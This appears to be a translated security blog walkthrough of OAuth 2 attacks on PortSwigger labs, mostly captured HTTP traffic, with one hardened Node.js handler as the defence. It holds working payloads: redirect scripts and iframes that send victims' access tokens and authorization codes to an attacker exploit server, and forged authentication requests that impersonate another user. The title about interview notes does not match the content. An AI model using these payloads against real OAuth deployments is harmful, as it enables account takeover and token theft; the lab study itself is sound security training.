Understanding and Breaking OAuth 2; Xiaomi and Alibaba interview notes from a five-year big-data developer

A quick self-introduction: the author graduated from Zhejiang University, has worked at Huawei, ByteDance and other large companies, and is currently a P7 at Alibaba.


Main text

  • Build a malicious link on the attacker's server and lure the target user into clicking it; the request that follows completes the attack.
<script>
  if (!document.location.hash) {
    window.location = 'https://YOUR-LAB-AUTH-SERVER.web-security-academy.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.web-security-academy.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email'
  } else {
    window.location = '/?' + document.location.hash.substr(1)
  }
</script>

Example 4

Besides the approach above, tokens can also be stolen through other routes:

  • Unsafe JavaScript handling
  • XSS vulnerabilities
  • HTML template injection

Example 5

6. Flawed scope validation

Scope upgrade: authorization code grant
Suppose the attacker's malicious client application initially requests access to the user's email address using the openid and email scopes. After the user approves the request, the malicious client receives an authorization code. Because the attacker controls the client application, they can add a further scope parameter, containing the additional profile scope, to the code/token exchange request:

POST /token
Host: oauth-authorization-server.com
…
client_id=12345&client_secret=SECRET&redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8&scope=openid%20email%20profile

If the OAuth service does not check that the scope matches the one in the initial request, it issues an access_token for the scope the attacker newly requested:

{
    "access_token": "z0y9x8w7v6u5",
    "token_type": "Bearer",
    "expires_in": 3600,
    "scope": "openid email profile",
    …
}

Scope upgrade: implicit grant
Here the attacker has obtained an access_token directly through one of the attacks described earlier and simply adds new scopes to the scope parameter. The OAuth service should validate this scope value against the value recorded when the token was generated, but in practice, as long as the adjusted permissions do not exceed the access level previously granted to this client application, the attacker may be able to access additional data without any further approval from the user.
Unverified registration: user authentication grant
Client applications usually treat the user account information they receive from the OAuth service as trusted by default, without verifying it.
An attacker can try registering a new account directly with the OAuth service, filling it with the target user's details. Because the OAuth service's validation of that content is not thorough enough, the attacker can then log in to the client application through the OAuth service with the newly registered account. Since this account's information is essentially identical to the target user's, the client treats it as the target user logging in, and the attacker lands directly in the target's account.

7. Extending OAuth with OpenID Connect for authentication
  1. Why OpenID Connect came about

OAuth was originally designed for authorization only, i.e. granting a client application access to a given resource. Subsequently, a large number of applications used authorization services to reach user account resources, obtaining the user's account credentials and using them as the client application's authentication.
This original approach required custom configuration for each OAuth provider in order to implement so-called "authentication". OpenID Connect therefore emerged as an extension of the OAuth protocol, establishing a dedicated identity and authentication layer on top of an OAuth implementation and providing relatively standard, easy-to-use authentication functionality.

  2. How OpenID Connect works

Overall, using it involves only two changes:

  • scope: openid xxx
    • profile
    • email
    • address
    • phone
  • response_type: id_token
    • Returns a JSON Web Token (JWT) signed with a JSON Web Signature (JWS)
    • No need to obtain an access token and request user data separately: immediately after the user authenticates, an ID token containing the data is sent back in the response.
    • The integrity of the transmitted data rests on the JWT's cryptographic signature. The keys used to verify the signature are delivered over the same network channel as OAuth (typically published at /.well-known/jwks.json).
    • response_type can take multiple values:

response_type=id_token token
response_type=id_token code

  3. OAuth service dynamic registration vulnerabilities

The OAuth client registration path can usually be found by inspecting the server's publicly exposed paths.

Standard registration request:

POST /openid/register HTTP/1.1 (adjust the path according to the server's configuration)
Content-Type: application/json
Accept: application/json
Host: oauth-authorization-server.com
Authorization: Bearer ab12cd34ef56gh89

{
"application_type": "web",
"redirect_uris": [
"https://client-app.com/callback",
"https://client-app.com/callback2"
],
"client_name": "My Application",
"logo_uri": "https://client-app.com/logo.png",
"token_endpoint_auth_method": "client_secret_basic",
"jwks_uri": "https://client-app.com/my_public_keys.jwks",
"userinfo_encrypted_response_alg": "RSA1_5",
"userinfo_encrypted_response_enc": "A128CBC-HS256",
…
}

If the OAuth service does not validate the Authorization header, an attacker can construct the registration request themselves and complete registration. The request also contains many URIs (redirect_uris, logo_uri, jwks_uri, etc.), which can be tested for SSRF or for information leakage through arbitrary redirects.

Example 6

III. Vulnerability examples

1. Authentication bypass via OAuth implicit flow
  • Goal

Log in to the carlos account without knowing the target user's password.
The site allows login with a social media account. Test account wiener:peter; target account email carlos@carlos-montoya.net

  • Walkthrough
Capture the traffic and analyse the implicit-grant authentication flow.

Interaction 1: clicking the account link shows the social media login

GET /social-login HTTP/1.1
Host: aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Cookie: session=EqvfiG2Ch3BSyI3m8HbvdAVTBoDv2lAt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: 



The response contains the OAuth request path:

<meta http-equiv=refresh content='3;url=https://oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net/auth?client_id=fvssuu3sg44ljzyn6r0ep&redirect_uri=https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net/oauth-callback&response_type=token&nonce=-487256685&scope=openid%20profile%20email'>
<p>We are now redirecting you to login with social media...</p>

From the URL parameters, response_type is `token`, i.e. the implicit grant type. Taken together, this is OAuth being used for authentication.
Interaction 2: the client sends the authentication request to that URL

GET /auth?client_id=fvssuu3sg44ljzyn6r0ep&redirect_uri=https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net/oauth-callback&response_type=token&nonce=-487256685&scope=openid%20profile%20email HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net

The response contains the internal interaction path and sets cookies:

HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD; path=/interaction/2gEEwfwhCnj8cOwJ0DhAD; expires=Wed, 25 May 2022 00:32:37 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=2gEEwfwhCnj8cOwJ0DhAD; path=/auth/2gEEwfwhCnj8cOwJ0DhAD; expires=Wed, 25 May 2022 00:32:37 GMT; samesite=lax; secure; httponly
Location: /interaction/2gEEwfwhCnj8cOwJ0DhAD
Content-Type: text/html; charset=utf-8
Date: Wed, 25 May 2022 00:22:37 GMT
Connection: close
Content-Length: 99

Redirecting to <a href="/interaction/2gEEwfwhCnj8cOwJ0DhAD">/interaction/2gEEwfwhCnj8cOwJ0DhAD</a>.

Interaction 3: the username and password are supplied, together with the cookie obtained above, in a POST to the internal interaction path

POST /interaction/2gEEwfwhCnj8cOwJ0DhAD/login HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD

username=wiener&password=peter

After the credentials are verified, the response contains a new authentication URL:

HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net/auth/2gEEwfwhCnj8cOwJ0DhAD
Date: Wed, 25 May 2022 00:23:50 GMT
Connection: close
Content-Length: 0

Interaction 4: a GET request to that URL fetches the user's authorization confirmation page

GET /auth/2gEEwfwhCnj8cOwJ0DhAD HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction_resume=2gEEwfwhCnj8cOwJ0DhAD

The response does not return the page directly; instead it sets an additional cookie and gives a new internal interaction path.

HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD; path=/interaction/2gEEwfwhCnj8cOwJ0DhAD; expires=Wed, 25 May 2022 00:33:51 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=2gEEwfwhCnj8cOwJ0DhAD; path=/auth/2gEEwfwhCnj8cOwJ0DhAD; expires=Wed, 25 May 2022 00:33:51 GMT; samesite=lax; secure; httponly
Set-Cookie: _session=Ah7U6Zc6D4aC2zCQHjjOu; path=/; expires=Wed, 08 Jun 2022 00:23:51 GMT; samesite=none; secure; httponly
Set-Cookie: _session.legacy=Ah7U6Zc6D4aC2zCQHjjOu; path=/; expires=Wed, 08 Jun 2022 00:23:51 GMT; secure; httponly
Location: /interaction/2gEEwfwhCnj8cOwJ0DhAD
Content-Type: text/html; charset=utf-8
Date: Wed, 25 May 2022 00:23:51 GMT
Connection: close
Content-Length: 99

Redirecting to <a href="/interaction/2gEEwfwhCnj8cOwJ0DhAD">/interaction/2gEEwfwhCnj8cOwJ0DhAD</a>

Interaction 5: a GET request to the new URL, carrying both the old and the new cookies

GET /interaction/2gEEwfwhCnj8cOwJ0DhAD HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD; _session=Ah7U6Zc6D4aC2zCQHjjOu; _session.legacy=Ah7U6Zc6D4aC2zCQHjjOu

The authorization confirmation page finally comes back; it asks for profile and email:

<strong>WeLikeToBlog</strong> is requesting access to:</li>
<ul>

<li>Profile</li>

<li>Email</li>

Interaction 6: the user clicks to confirm.

POST /interaction/2gEEwfwhCnj8cOwJ0DhAD/confirm HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD; _session=Ah7U6Zc6D4aC2zCQHjjOu; _session.legacy=Ah7U6Zc6D4aC2zCQHjjOu

The response gives the URL for the next request:

HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net/auth/2gEEwfwhCnj8cOwJ0DhAD

Interaction 7: another GET request to the page requested earlier, this time carrying both the old and the new cookies

GET /auth/2gEEwfwhCnj8cOwJ0DhAD HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction_resume=2gEEwfwhCnj8cOwJ0DhAD; _session=Ah7U6Zc6D4aC2zCQHjjOu; _session.legacy=Ah7U6Zc6D4aC2zCQHjjOu

This response is far more useful: the next URL it provides contains all of the OAuth parameters, in particular the long-awaited `access_token`.

Interaction 8: now the OAuth side finally takes the initiative and sends a GET request to the client application

GET /oauth-callback HTTP/1.1
Host: aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Cookie: session=EqvfiG2Ch3BSyI3m8HbvdAVTBoDv2lAt

Looking at the response makes it clear: it is JavaScript from the client application that parses the parameters, and the two sides then exchange the remaining data via AJAX. The agreed sequence is:

  • The client initiates an AJAX request and the OAuth server returns the data.
  • The OAuth identity data is sent to the client application, which uses it to complete the user's login.
  • Redirect to the home page.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 734

<script>
const urlSearchParams = new URLSearchParams(window.location.hash.substr(1));
const token = urlSearchParams.get('access_token');
fetch('https://oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net/me', {    // AJAX request initiated by the client
    method: 'GET',
    headers: {
        'Authorization': 'Bearer ' + token,
        'Content-Type': 'application/json'
    }
})
.then(r => r.json())
.then(j => 
    fetch('/authenticate', {    // content and format of the data passed back to the client application
        method: 'POST',
        headers: {
            'Accept': 'application/json',
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            email: j.email,
            username: j.sub,
            token: token
        })
    }).then(r => document.location = '/'))    // redirect to the home page
</script>

Interaction 9: the client initiates the AJAX request and the OAuth server returns the data.

GET /me HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net/
Authorization: Bearer yErTtKxjHZi8pEh0-Gm9QKyO2RJcZuGGqyetLKS3wGX
Content-Type: application/json
Origin: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

Response data:

HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Origin: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Access-Control-Expose-Headers: WWW-Authenticate
Pragma: no-cache
Cache-Control: no-cache, no-store
Content-Type: application/json; charset=utf-8
Date: Wed, 25 May 2022 00:26:29 GMT
Connection: close
Content-Length: 88

{"sub":"wiener","name":"Peter Wiener","email":"wiener@hotdog.com","email_verified":true}

Interaction 10: the final step; the OAuth identity data is sent to the client application, which uses it to complete the user's login

POST /authenticate HTTP/1.1
Host: aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Cookie: session=EqvfiG2Ch3BSyI3m8HbvdAVTBoDv2lAt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net/oauth-callback
Content-Type: application/json
Origin: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Content-Length: 103
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"email":"wiener@hotdog.com","username":"wiener","token":"yErTtKxjHZi8pEh0-Gm9QKyO2RJcZuGGqyetLKS3wGX"}

Finally, the client application redirects to the home page (and the user is now logged in).

That is the complete analysis of the traffic. With the flow understood, we can now exploit the vulnerability in it.

  1. This lab is very simple. Following the flow above, take the final step, interaction 10, and replace the email and username with the target user's details. If the flow does not verify them, the client application assumes the authentication data it received belongs to carlos and logs the attacker in as that user.
POST /authenticate HTTP/1.1
Host: ac6a1fce1edb9238c08751db007a00bf.web-security-academy.net
Cookie: session=h8MMYmtjjanwfWANDP1wjYBUNVBbb1M3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://ac6a1fce1edb9238c08751db007a00bf.web-security-academy.net/oauth-callback
Content-Type: application/json
Origin: https://ac6a1fce1edb9238c08751db007a00bf.web-security-academy.net
Content-Length: 111
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"email":"carlos@carlos-montoya.net","username":"carlos","token":"rwCpJDSVYKbWNyaarAOUUrWFeEsLsGivV6zg25qik6m"}

Login succeeds.
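The root cause in this lab, and in the "unverified registration" case in section 6, is the same: the client application derives the user's identity from data it did not verify. As an added example (not code from the original post or the lab), the Node.js snippet below contrasts the vulnerable /authenticate handler with a hardened one that takes only the token from the POST body, asks the provider's userinfo endpoint who the token belongs to, and matches the account on issuer plus `sub` rather than on the posted email or username. The userinfo table, issuer URL and account list are constructed for the demo; `fetchUserinfo` stands in for the real GET /me call.

```javascript
// Constructed stand-in for GET /me on the OAuth server: bearer token -> claims.
const userinfoByToken = new Map([
  ['tok-wiener', { sub: 'wiener', name: 'Peter Wiener', email: 'wiener@hotdog.com', email_verified: true }],
  // An account an attacker registered at the provider with the victim's e-mail address.
  ['tok-mallory', { sub: 'mallory', name: 'Carlos Montoya', email: 'carlos@carlos-montoya.net', email_verified: false }],
]);
function fetchUserinfo(token) {
  return userinfoByToken.get(token) || null;
}

// The client application's users. The OAuth link is keyed by issuer + sub, the
// only identifier the provider guarantees to be stable and unique.
const ISSUER = 'https://oauth-server.example'; // assumed
const accounts = [
  { username: 'wiener', email: 'wiener@hotdog.com', oauthId: `${ISSUER}|wiener` },
  { username: 'carlos', email: 'carlos@carlos-montoya.net', oauthId: `${ISSUER}|carlos` },
];

// Vulnerable handler: logs in whoever the JSON body says it is.
function authenticateVulnerable(body) {
  const account = accounts.find((a) => a.username === body.username);
  return account ? { loggedInAs: account.username } : { error: 'unknown_user' };
}

// Resolve an account from the provider's claims. Match on issuer+sub first; only
// fall back to e-mail when the provider asserts that it verified the address, so
// an account freshly registered at the provider with the victim's e-mail is refused.
function resolveAccount(claims) {
  const byId = accounts.find((a) => a.oauthId === `${ISSUER}|${claims.sub}`);
  if (byId) return byId;
  if (claims.email_verified === true && typeof claims.email === 'string') {
    return accounts.find((a) => a.email === claims.email) || null;
  }
  return null;
}

// Hardened handler: the only thing taken from the body is the token; identity
// comes from the provider's answer, and the posted email/username are ignored.
function authenticateHardened(body, userinfo = fetchUserinfo) {
  if (typeof body.token !== 'string' || body.token === '') return { error: 'missing_token' };
  const claims = userinfo(body.token);
  if (!claims || typeof claims.sub !== 'string') return { error: 'invalid_token' };
  const account = resolveAccount(claims);
  if (!account) return { error: 'no_linked_account' };
  return { loggedInAs: account.username };
}
```

Even the `email_verified` fallback is a trade-off: it is only as good as the provider's own verification, so a client that cannot vouch for the provider should link accounts exclusively by issuer and `sub` and require an explicit, authenticated linking step for anything else.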

2. Forced OAuth profile linking
  • Goal

Log in to the client application's admin account using the attacker's social media account, and use its privileges to delete the carlos account.
Accounts available to the attacker:
Client application account wiener:peter
Social media account: peter.wiener:hotdog

  • Walkthrough
    1. After capturing traffic to get familiar with the login flow, notice that there is no state parameter, so a CSRF attack can be attempted. Browsing the captured requests, the point of entry is GET /oauth-linking?code=[...]
    2. Log in to the client application with the attacker's account, click to link a social media account, intercept this request, save the code and drop the request, so that the code stays fresh and unused.
GET /oauth-linking?code=24uFvh01DqV6Sog-ZSiYAaPznbaDYE9QaJ2O66vJeXT HTTP/1.1
Host: ac001f981f3bc17fc0d623e8006b0093.web-security-academy.net
Cookie: session=ASfvnXuHTLWHIXPTaRYWKyrSUsAXULLB

    3. Build the attack payload and send it to the target user (admin). As soon as they open it, the social media account linking completes automatically, so the target's admin account is now linked to the attacker's social media account.
<iframe src="https://ac001f981f3bc17fc0d623e8006b0093.web-security-academy.net/oauth-linking?code=24uFvh01DqV6Sog-ZSiYAaPznbaDYE9QaJ2O66vJeXT "></iframe>

    4. Log out of the client application and log in directly with the attacker's social media account: the resulting session is the admin account. Use admin's privileges to delete the carlos account.
3. OAuth account hijacking via redirect_uri
  • Goal

The attacker steals the admin user's authorization code, uses it to log in to that account, and deletes the carlos account with administrator privileges.
Client application account available to the attacker: wiener:peter

  • Walkthrough
Capture the traffic and analyse the authorization code grant flow.

Interaction 1: on clicking login, the client application first sends a request to the OAuth server.

GET /auth?client_id=up6pjbyzpz48izvajspcc&redirect_uri=https://ac161f371efa484fc0cd6f6500bf009a.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net

The response provides the URL where the resource owner logs in to their OAuth account:

HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_; path=/interaction/B3ArOcTi85E97Xwrgpmc_; expires=Wed, 25 May 2022 13:27:17 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=B3ArOcTi85E97Xwrgpmc_; path=/auth/B3ArOcTi85E97Xwrgpmc_; expires=Wed, 25 May 2022 13:27:17 GMT; samesite=lax; secure; httponly
Location: /interaction/B3ArOcTi85E97Xwrgpmc_
Content-Type: text/html; charset=utf-8
Date: Wed, 25 May 2022 13:17:17 GMT
Connection: close
Content-Length: 99

Redirecting to <a href="/interaction/B3ArOcTi85E97Xwrgpmc_">/interaction/B3ArOcTi85E97Xwrgpmc_</a>.

Interaction 2-1: the client redirects to the OAuth login page

GET /interaction/B3ArOcTi85E97Xwrgpmc_ HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net

Response:

<form autocomplete="off" action="/interaction/B3ArOcTi85E97Xwrgpmc_/login" class="login-form" method="post">
<input required type="text" name="username" placeholder="Enter a username or email" autofocus="on">
<input required type="password" name="password" placeholder="and password" >

<button type="submit" class="login login-submit">Sign-in</button>
</form>

Interaction 2-2: the user enters their username and password to log in to the OAuth server, which is required for the user confirmation that follows

POST /interaction/B3ArOcTi85E97Xwrgpmc_/login HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Referer: https://oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net/interaction/B3ArOcTi85E97Xwrgpmc_
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=wiener&password=peter

The response contains the URL for the next redirect:

HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net/auth/B3ArOcTi85E97Xwrgpmc_
Date: Wed, 25 May 2022 13:17:30 GMT
Connection: close
Content-Length: 0

Interaction 2-3: a session cookie is added, and the response contains the next redirect URL

GET /auth/B3ArOcTi85E97Xwrgpmc_ HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction_resume=B3ArOcTi85E97Xwrgpmc_ing

HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_; path=/interaction/B3ArOcTi85E97Xwrgpmc_; expires=Wed, 25 May 2022 13:27:31 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=B3ArOcTi85E97Xwrgpmc_; path=/auth/B3ArOcTi85E97Xwrgpmc_; expires=Wed, 25 May 2022 13:27:31 GMT; samesite=lax; secure; httponly
Set-Cookie: _session=x0eVTPB_m7JKuiQCFXeyH; path=/; expires=Wed, 08 Jun 2022 13:17:31 GMT; samesite=none; secure; httponly
Set-Cookie: _session.legacy=x0eVTPB_m7JKuiQCFXeyH; path=/; expires=Wed, 08 Jun 2022 13:17:31 GMT; secure; httponly
Location: /interaction/B3ArOcTi85E97Xwrgpmc_
Content-Type: text/html; charset=utf-8
Date: Wed, 25 May 2022 13:17:31 GMT
Connection: close
Content-Length: 99

Redirecting to <a href="/interaction/B3ArOcTi85E97Xwrgpmc_">/interaction/B3ArOcTi85E97Xwrgpmc_</a>.

Interaction 2-4: the authorization details page is displayed

GET /interaction/B3ArOcTi85E97Xwrgpmc_ HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_; _session=x0eVTPB_m7JKuiQCFXeyH; _session.legacy=x0eVTPB_m7JKuiQCFXeyH

<strong>WeLikeToBlog</strong> is requesting access to:</li>
<ul>

<li>Profile</li>

<li>Email</li>

<form autocomplete="off" action="/interaction/B3ArOcTi85E97Xwrgpmc_/confirm" method="post">
<button autofocus type="submit" class="login login-submit">Continue</button>
</form>

Interaction 2-5: the user confirms the authorization

POST /interaction/B3ArOcTi85E97Xwrgpmc_/confirm HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_; _session=x0eVTPB_m7JKuiQCFXeyH; _session.legacy=x0eVTPB_m7JKuiQCFXeyH

HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net/auth/B3ArOcTi85E97Xwrgpmc_
Date: Wed, 25 May 2022 13:17:38 GMT
Connection: close
Content-Length: 0


Interaction 2-6: following the previous response, redirect to the path visited earlier, this time carrying the two session cookies

GET /auth/B3ArOcTi85E97Xwrgpmc_ HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction_resume=B3ArOcTi85E97Xwrgpmc_; _session=x0eVTPB_m7JKuiQCFXeyH; _session.legacy=x0eVTPB_m7JKuiQCFXeyH

The response contains the authorization code:

Redirecting to <a href="https://ac161f371efa484fc0cd6f6500bf009a.web-security-academy.net/oauth-callback?code=TTr3b7FBzmVHh4-GejLf9H07DP8MYpn1a_jz9uH3CIu">https://ac161f371efa484fc0cd6f6500bf009a.web-security-academy.net/oauth-callback?code=TTr3b7FBzmVHh4-GejLf9H07DP8MYpn1a_jz9uH3CIu</a>

Interaction 3: the OAuth server sends the authorization code (code) to the client

GET /oauth-callback?code=TTr3b7FBzmVHh4-GejLf9H07DP8MYpn1a_jz9uH3CIu HTTP/1.1
Host: ac161f371efa484fc0cd6f6500bf009a.web-security-academy.net
Cookie: session=3pNj65CoXY2qnsvZCynoRGaV6lU1RVb0

Interaction 4: exchanging the authorization code for an access token
At this point the captured traffic stops. As described at the start of the article, from step 4 onwards the authorization code grant exchanges data over a dedicated back-channel, so those packets can no longer be intercepted for analysis.

That is the complete analysis of the authorization code grant. With the flow above understood, the approach to this lab, stealing the code value through redirect_uri, becomes very clear.

  1. Now to solve it. The principle is to change the redirect_uri parameter in the URL of interaction 1 to the attacker's server and send it to the target user; the request of interaction 3 is then sent to the attacker's server, giving the attacker the code.
<iframe src="https://oauth-ac441fc71e308b78c0260c0902c20096.web-security-academy.net/auth?client_id=fwkhrpwp8z0gwo7chxrmy&redirect_uri=https://exploit-acec1f181e298b2bc0bd0c150122004d.web-security-academy.net&response_type=code&scope=openid%20profile%20email"></iframe>

Checking the access log, the request is indeed there:
"GET /?code=Q4Tg5-rB-_-zu0MKq6cPcMtTUeRysPemcldGkorFi9o HTTP/1.1" 200......

  2. Having obtained the code, the attacker opens the interaction 3 URL in a browser, which completes the remaining flow.

https://ac531fb41ec08b3cc0810c79002c001a.web-security-academy.net/oauth-callback?code=Q4Tg5-rB-_-zu0MKq6cPcMtTUeRysPemcldGkorFi9o
Login succeeds; the rest is not repeated here.

4. Stealing OAuth access tokens via an open redirect
  • Goal

Find an open redirect vulnerability in the client application, use it to obtain admin's access token, and submit admin's API key.

  • Approach
    1. First find the open redirect vulnerability in the client application
GET /post/next?path=/post?postId=6 HTTP/1.1
Host: ac2b1f881e04cc62c048795500be00cf.web-security-academy.net
Cookie: session=Rv9IbR4Pq6TofZJQyhDSGWcs8svcf58v

  2. Confirm whether the OAuth request parameter redirect_uri allows path traversal or truncation
GET /auth?client_id=yodhmqw5cibuz9vdzcomt&redirect_uri=https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net/oauth-callback../post/next?path=https://exploit-ac811f7f1eafcc5ac0c77950017b0084.web-security-academy.net/exploit&response_type=token&nonce=1378893845&scope=openid%20profile%20email HTTP/1.1

HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=dskLB4pHVVWJ7PnC_Ux8S; path=/interaction/dskLB4pHVVWJ7PnC_Ux8S; expires=Thu, 26 May 2022 00:57:38 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=dskLB4pHVVWJ7PnC_Ux8S; path=/auth/dskLB4pHVVWJ7PnC_Ux8S; expires=Thu, 26 May 2022 00:57:38 GMT; samesite=lax; secure; httponly
Location: /interaction/dskLB4pHVVWJ7PnC_Ux8S
Content-Type: text/html; charset=utf-8
Date: Thu, 26 May 2022 00:47:38 GMT
Connection: close
Content-Length: 99

Redirecting to <a href="/interaction/dskLB4pHVVWJ7PnC_Ux8S">/interaction/dskLB4pHVVWJ7PnC_Ux8S</a>

  3. Rebuild the request so that the redirect_uri path traverses to the page with the open redirect, with the attacker's URL as that page's parameter

https://oauth-ac031fdd1e29cc34c07079ff028e00f7.web-security-academy.net/auth?client_id=yodhmqw5cibuz9vdzcomt&redirect_uri=https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-ac811f7f1eafcc5ac0c77950017b0084.web-security-academy.net/exploit&response_type=token&nonce=1378893845&scope=openid%20profile%20email
Open that URL in the browser, then check the attacker server's log:
/?access_token=w9h6KFc7fIuvtqzf3bNZEQOhTnISa1XoTl8TOQA80F6&expires_in=3600&token_type=Bearer&scope=openid%20profile%20email    The access_token arrives, so the attack is feasible.
With the test successful, the real attack can begin.

  4. Build the JavaScript on the attacker's server, send it to the target user and lure them into clicking it
<script>
  if (!document.location.hash) {
    window.location = 'https://oauth-ac031fdd1e29cc34c07079ff028e00f7.web-security-academy.net/auth?client_id=yodhmqw5cibuz9vdzcomt&redirect_uri=https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-ac811f7f1eafcc5ac0c77950017b0084.web-security-academy.net/exploit&response_type=token&nonce=1378893845&scope=openid%20profile%20email'
  } else {
    window.location = '/?' + document.location.hash.substr(1)
